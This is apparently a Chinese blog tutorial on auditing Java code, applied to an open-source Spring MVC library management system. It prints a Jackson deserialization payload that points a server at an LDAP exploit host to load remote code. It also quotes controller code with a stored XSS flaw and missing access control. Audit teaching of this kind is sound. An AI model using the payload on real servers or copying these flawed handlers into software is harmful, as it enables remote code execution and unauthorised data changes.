java代码审计入门-图书馆管理系统项目审计

最新推荐文章于 2024-05-05 20:51:43 发布
最新推荐文章于 2024-05-05 20:51:43 发布
阅读量544 收藏 7
点赞数 4
文章标签: java 开发语言 web安全 代码复审 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29616295/article/details/131829557
版权

一 配置好项目,启动项目

 该项目是标准的html+css作为前端,spring mvc架构模式作为后端的java开源项目,使用tomcat作为web容器,mysql作为数据库。将项目启动完毕后,开始进行相关的安全审计。

二 漏洞审计

漏洞的审计通常包括两个方面,通用性漏洞审计(多为中间件漏洞)和硬编码漏洞审计(程序员编码漏洞)。

2.1 通用性漏洞审计

java项目多为基于maven引入相关依赖,有时候也会遇见直接从lib导入依赖的,本项目为maven项目,打开pom.xml文件查看相关依赖。

 对相关中间件版本进行查看是否存在通用型漏洞

spring

经过查找,发现了一个疑似可以利用的漏洞CVE-2022-22965(影响范围为Spring Framework版本为5.3.0到5.3.17,5.2.0到5.2.19以及其他老版本) 该漏洞需要满足条件:

使用JDK9及以上版本
使用Apache Tomcat作为容器
使用了传统的WAR包部署方式
依赖了spring-wemvc以及springwebflux
Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20

因此无法利用该漏洞,不过写完这篇文章肥肥鲨也想去研究一下相关漏洞

Tomcat,Servlet

这里我用的是自己的tomcat所以就不看了

Jackson

2.8.8版本存在jackson反序列化漏洞CVE-2020-36188,危险函数为readValue和writeValueAsString。

ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping();

String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":\"true\"}]";

Object o = mapper.readValue(payload, Object.class);

mapper.writeValueAsString(o);

全局搜索这两个函数,发现本项目没有引用这两个函数,因此该漏洞不好利用。

总结

项目使用的包版本较老,很多中间件都存在问题,包括但不限于jackson,jetty等,由于项目本身较小,没有明显的通用型漏洞,但如果考虑到项目的拓展性,应当对相关的中间件进行升级。

2.2 硬编码漏洞审计

项目结构

 项目采用标准mvc架构,数据库中间件采用了hibernate,该中间件sql注入较少,没有看到相关参数的Filter,可能会存在xss,文件上传等常见漏洞。

存储型xss漏洞

在修改个人信息相关的功能模块发现存储型xss漏洞,相关代码如下:

@RequestMapping("reader_edit_do_r.html")
    public String readerInfoEditDoReader(HttpServletRequest request,String name,String sex,String birth,String address,String telcode,RedirectAttributes redirectAttributes){
        ReaderCard readerCard=(ReaderCard) request.getSession().getAttribute("readercard");
        if (!readerCard.getName().equals(name)){
            boolean succo=readerCardService.updateName(readerCard.getReaderId(),name);
            SimpleDateFormat sdf=new SimpleDateFormat("yyyy-MM-dd");
            Date nbirth=new Date();
            try{
                java.util.Date date=sdf.parse(birth);
                nbirth=date;
            }catch (ParseException e){
                e.printStackTrace();
            }

            ReaderInfo readerInfo=new ReaderInfo();
            readerInfo.setAddress(address);
            readerInfo.setBirth(nbirth);
            readerInfo.setName(name);
            readerInfo.setReaderId(readerCard.getReaderId());
            readerInfo.setTelcode(telcode);
            readerInfo.setSex(sex);

            boolean succ=readerInfoService.editReaderInfo(readerInfo);
            if(succ&&succo){
                ReaderCard readerCardNew = loginService.findReaderCardByUserId(readerCard.getReaderId());
                request.getSession().setAttribute("readercard", readerCardNew);
                redirectAttributes.addFlashAttribute("succ", "信息修改成功!");
                return "redirect:/reader_info.html";
            }else {
                redirectAttributes.addFlashAttribute("error", "信息修改失败!");
                return "redirect:/reader_info.html";
            }



        }else {
            SimpleDateFormat sdf=new SimpleDateFormat("yyyy-MM-dd");
            Date nbirth=new Date();
            try{
                java.util.Date date=sdf.parse(birth);
                nbirth=date;
            }catch (ParseException e){
                e.printStackTrace();
            }

            ReaderInfo readerInfo=new ReaderInfo();
            readerInfo.setAddress(address);
            readerInfo.setBirth(nbirth);
            readerInfo.setName(name);
            readerInfo.setReaderId(readerCard.getReaderId());
            readerInfo.setTelcode(telcode);
            readerInfo.setSex(sex);

            boolean succ=readerInfoService.editReaderInfo(readerInfo);
            if(succ){
                ReaderCard readerCardNew = loginService.findReaderCardByUserId(readerCard.getReaderId());
                request.getSession().setAttribute("readercard", readerCardNew);
                redirectAttributes.addFlashAttribute("succ", "信息修改成功!");
                return "redirect:/reader_info.html";
            }else {
                redirectAttributes.addFlashAttribute("error", "信息修改失败!");
                return "redirect:/reader_info.html";
            }
        }



    }

从前端获取参数未过滤就调用了Service层的方法,但是要正确执行xss还要看处理显示的相关方法。相关方法如下:

@RequestMapping("/reader_info.html")
    public ModelAndView toReaderInfo(HttpServletRequest request) {
        ReaderCard readerCard=(ReaderCard) request.getSession().getAttribute("readercard");
        ReaderInfo readerInfo=readerInfoService.getReaderInfo(readerCard.getReaderId());
        ModelAndView modelAndView=new ModelAndView("reader_info");
        modelAndView.addObject("readerinfo",readerInfo);
        return modelAndView;
    }

可以看出在redaer_info这一块确实存在xss漏洞,验证如下:

 

 垂直越权漏洞

在审计xss漏洞的同时,发现后端并没有对非管理员用户进行访问控制,所有用户均可以直接请求reader_edit_do方法进行任意读者信息的增删改查。相关问题代码如下:

    @RequestMapping("reader_edit_do.html")
    public String readerInfoEditDo(HttpServletRequest request,String name,String sex,String birth,String address,String telcode,RedirectAttributes redirectAttributes){
        int readerId= Integer.parseInt(request.getParameter("id"));
        ReaderCard readerCard = loginService.findReaderCardByUserId(readerId);
        String oldName=readerCard.getName();
        if(!oldName.equals(name)){
            boolean succo=readerCardService.updateName(readerId,name);
            SimpleDateFormat sdf=new SimpleDateFormat("yyyy-MM-dd");
            Date nbirth=new Date();
            try{
                java.util.Date date=sdf.parse(birth);
                nbirth=date;
            }catch (ParseException e){
                e.printStackTrace();
            }
            ReaderInfo readerInfo=new ReaderInfo();
            readerInfo.setAddress(address);
            readerInfo.setBirth(nbirth);
            readerInfo.setName(name);
            readerInfo.setReaderId(readerId);
            readerInfo.setTelcode(telcode);
            readerInfo.setSex(sex);
            boolean succ=readerInfoService.editReaderInfo(readerInfo);
            if(succo&&succ){
                redirectAttributes.addFlashAttribute("succ", "读者信息修改成功!");
                return "redirect:/allreaders.html";
            }else {
                redirectAttributes.addFlashAttribute("error", "读者信息修改失败!");
                return "redirect:/allreaders.html";
            }
        }
        else {
            System.out.println("部分修改");
            SimpleDateFormat sdf=new SimpleDateFormat("yyyy-MM-dd");
            Date nbirth=new Date();
            try{
                java.util.Date date=sdf.parse(birth);
                nbirth=date;
            }catch (ParseException e){
                e.printStackTrace();
            }
            ReaderInfo readerInfo=new ReaderInfo();
            readerInfo.setAddress(address);
            readerInfo.setBirth(nbirth);
            readerInfo.setName(name);
            readerInfo.setReaderId(readerId);
            readerInfo.setTelcode(telcode);
            readerInfo.setSex(sex);

            boolean succ=readerInfoService.editReaderInfo(readerInfo);
            if(succ){
                redirectAttributes.addFlashAttribute("succ", "读者信息修改成功!");
                return "redirect:/allreaders.html";
            }else {
                redirectAttributes.addFlashAttribute("error", "读者信息修改失败!");
                return "redirect:/allreaders.html";
            }
        }

    }

 直接给别人的信息改了。。。相似的还有很多,建议各位在处理业务逻辑的时候取id值直接从session里面取。

三 小结

本文主要还是给各位做代审提供一个基本的思路,选取的系统比较简单。漏洞也比较多,再审肯定还有别的,大部分都是硬编码漏洞,就到这吧。。。看累了。

Fat_Fat_Shark
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Java代码审计
2301_76786857的博客
03-11 1675
Java 是一种跨平台的编程语言,具有良好的可移植性和灵活性,因此在各种应用领域得到了广泛应用。从企业级应用到移动应用,从 Web 应用到嵌入式系统,Java 都有着重要的地位。然而,由于 Java 的普及性和复杂性,其中的安全漏洞和代码缺陷也变得更加普遍。 Java 代码审计是对使用Java编写的软件代码进行全面检查和分析,通过白盒的方式发现其中的安全漏洞和潜在风险,代码审计已成为保护网络安全性的重要手段之一。
JAVA代码审计
小白鸽
02-23 604
在后端代码处,首先经过Filter(过滤器)和Interceptor(拦截器),然后根据请求的URL映射到绑定的Controller,之后调用Service接口类,然后再调用serviceImpl接口实现类,最后调用DAO。src/main下面有两个目录,分别是java和resources,java目录中主要存放的是java代码,resources目录中主要存放的是资源文件,比如:html、js、css等。@ResponseBody 注解:将该注解写在类的外面,表示这个类所有方法的返回的数据直接给浏览器。
2024年Java最新Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计(1),Java程序员需要掌握的知识
最新发布
2301_82243769的博客
05-05 576
表达式注入是 Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入、SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
java代码审计_Java代码审计入门
weixin_39923945的博客
02-12 749
本期斗哥带来Java代码审计的一些环境和工具准备。Java这个语言相对于PHP来说还是比较复杂的,所以一开始接触到Java源码审计的时候会遇到一些关于环境和配置上一些困难,本文记录斗哥在开始去审计Java代码的一些准备,希望能够帮助到刚入门的新手朋友们。0×00 Java环境说明1. 安装Java环境安装完成后默认的安装目录:环境变量的配置,环境变量配置主要是告诉我们自己的电脑Java安装完后几个...
综述如何开展代码审计
qq_59611876的博客
04-25 431
综述开展代码审计的步骤
JAVA代码审计之四大框架学习
goddemon
08-30 583
java三大框架之间的关系 1.Struts:基于MVC的充当了其中的视图层和控制器; 2.Hibernate:做持久化的,对JDBC轻量级的封装,使得我们能过面向对象的操作数据库; 3.Spring: 采用了控制反转的技术,管理Bean,降低了各层之间的耦合。 一.Struts框架 web.xml //对于代码审计而言这个文件的核心是过滤机制 常用 <filter-mapping>的<url-pattern> //如 即当是以.action为结尾的请求时 都会调用这个过滤机制
AST_demo:利用JavaParser框架在编译时修改语法树(源码)的demo-修改
03-24
本示例展示了如下功能: 1,删除方法中的打印日志代码。 2,删除指定的方法和成员变量。 3,检测方法中是否有新的线程代码。 4,生成新的类和方法。并在运行时验证。 5,解析类文件:MainActivity.java,并在打印输出类信息。 6,修改类中的方法。将结果保存在工程目录下的/ output中。 7,在现有类中生成一个方法,并在运行时验证。 环境: gradle4.1 classpath 'com.android.tools.build:gradle:3.0.1' 1,删除类方法中的日志:Log.xxxx System.out.xxx 2,删除指定的方法和成员变量 //过滤如下 成员变量 和 方法 public void test() public int test(int a) String abc String def 3
图书馆-图书馆系统-图书馆系统源码-图书馆管理系统-图书馆管理系统java代码-基于springboot的图书馆系统-图书馆项目
03-31
图书馆系统源码-图书馆管理系统-图书馆管理系统java代码-图书馆系统设计与实现-基于springboot的图书馆系统-基于Web的图书馆系统设计与实现-图书馆网站-图书馆网站代码-图书馆平台-图书馆平台代码-图书馆项目-图书馆...
图书馆-图书馆系统-图书馆系统源码-图书馆管理系统-图书馆管理系统java代码-基于Web的图书馆系统设计与实现-图书馆项目代码
03-31
图书馆系统源码-图书馆管理系统-图书馆管理系统java代码-图书馆系统设计与实现-基于springboot的图书馆系统-基于Web的图书馆系统设计与实现-图书馆网站-图书馆网站代码-图书馆平台-图书馆平台代码-图书馆项目-图书馆...
学习笔记-java代码审计-反序列化
人饭子的博客
11-13 859
Java代码审计-反序列化 0x00 漏洞挖掘 业务代码 简单来说,找readObject/readUnshared就好了 protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String baseStr...
java审计-RCE审计
admin741admin的博客
04-13 468
RCE 的中文名称是远程命令执行,指的是攻击者通过Web 端或客户端提交执行命令,由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞,导致在没有指定绝对路径的情况下就可以执行命令。RCE 漏洞的原理其实也很简单,就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤,导致客户端可以提交恶意构造语句,并交由服务器端执行。
java代码审计_从零开始java代码审计系列(四)
weixin_33238272的博客
02-12 795
最近打算审一审web项目,毕竟复现一些java的经典漏洞和审计java web还是有些区别的,这次审计项目地址: https://gitee.com/oufu/ofcms审计时可以IDEA可以装上FindBugs还是有一些帮助的。后台任意文件上传漏洞路径/ofcms/ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/cms/Tem...
代码审计步骤
songbai220
12-11 1022
代码审计步骤 漏洞产生的原因 1、变量控制不严,一切输入都是有害的 2、变量到达有利用价值的函数(一切进入函数的变量都是有害的),漏洞的利用效果取决于最终函数的功能 步骤 1、通读代码 2、利用工具查找漏洞关键字 3、审查追踪代码,确认漏洞 4、黑白灰盒测试 工具 xseach 关键字搜索 seay 关键字搜索 fortify 漏洞扫描、追踪 工具的优势 速度快,自动化, fortify可以追踪代码给出漏洞提示 工具的局限性 1、工具本身存在一定量的误报或者漏报 2、扫描结果
Java代码审计入门
xiaoi123的博客
06-28 7990
作者:i春秋核心白帽yanzmi原文来自:https://bbs.ichunqiu.com/thread-42149-1-1.html本期斗哥带来Java代码审计的一些环境和工具准备。Java这个语言相对于PHP来说还是比较复杂的,所以一开始接触到Java源码审计的时候会遇到一些关于环境和配置上一些困难,本文记录斗哥在开始去审计Java代码的一些准备,希望能够帮助到刚入门的新手朋友们。0×00 J...
梦里寻她千百度 | 新书预告:JAVA代码安全审计入门篇)
Ms08067安全实验室
12-28 2236
近期很多读者询问关于《JAVA代码安全审计》一书的出版进展,统一回复下,目前新书《JAVA代码安全审计入门篇)》11月底已经完成全部书稿并交付出版社,全书分为九章460页,共计...
Java代码审计文章
soldi_er的博客
07-15 346
  代码审计是相对高效的漏洞挖掘方法,哪怕逐渐产生xcheck等使用污点分析的自动化审计软件,也仍然需要具有审计功底的工程师人工验证漏洞报告,甚至开发更佳的审计软件。有时觉得代码审计繁琐,但其实黑盒更繁琐且容易失去重心,辛勤的黑盒漏洞挖掘,可能还不如审出一个框架的CVE来的实在,。安全基于代码,更高于代码代码审计安全的精髓之一。   有一个不停内耗的疑惑:究竟是不断地追求成果,还是十年板凳无人问、一朝漏洞世人知?也许我们更应该关注自己。另外安全项目繁杂的,不断地有项目和事务向我们砸来,我们对某方面技术
代码审计入门
Grey的博客
07-13 2736
一、漏洞挖掘与防范1.搭建环境&lt;?php header("content-type:text/html;charset=utf-8"); //设置编码 $uid = $_GET['id']; $sql = "SELECT * FROM userinfo where id = $uid"; $conn = mysql_connect('localhost','root','root'); my...
[ 代码审计篇 ] Java web 代码审计 详解(一)
qq_51577576的博客
12-24 4018
Java web代码审计 第一篇 Java web代码审计 思路
java 审计功能_java filed 反射实现审计功能
weixin_30700095的博客
02-13 199
packagetest;importjava.lang.reflect.Field;importcom.labway.oa.po.Product;publicclassFieldtest{publicstaticvoidmain(String[]args)throwsException{Productp=newProduct();Field[]fields=p.ge...
Java数据库课程设计-图书馆管理系统文档2-实用指南
本文主要介绍了一款名为“图书馆管理系统”的Java数据库课程设计项目。该系统旨在帮助图书馆管理人员更高效地管理图书馆资源,包括书籍信息、借阅记录等。系统的功能包括:图书信息管理、借阅管理、归还管理、读者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值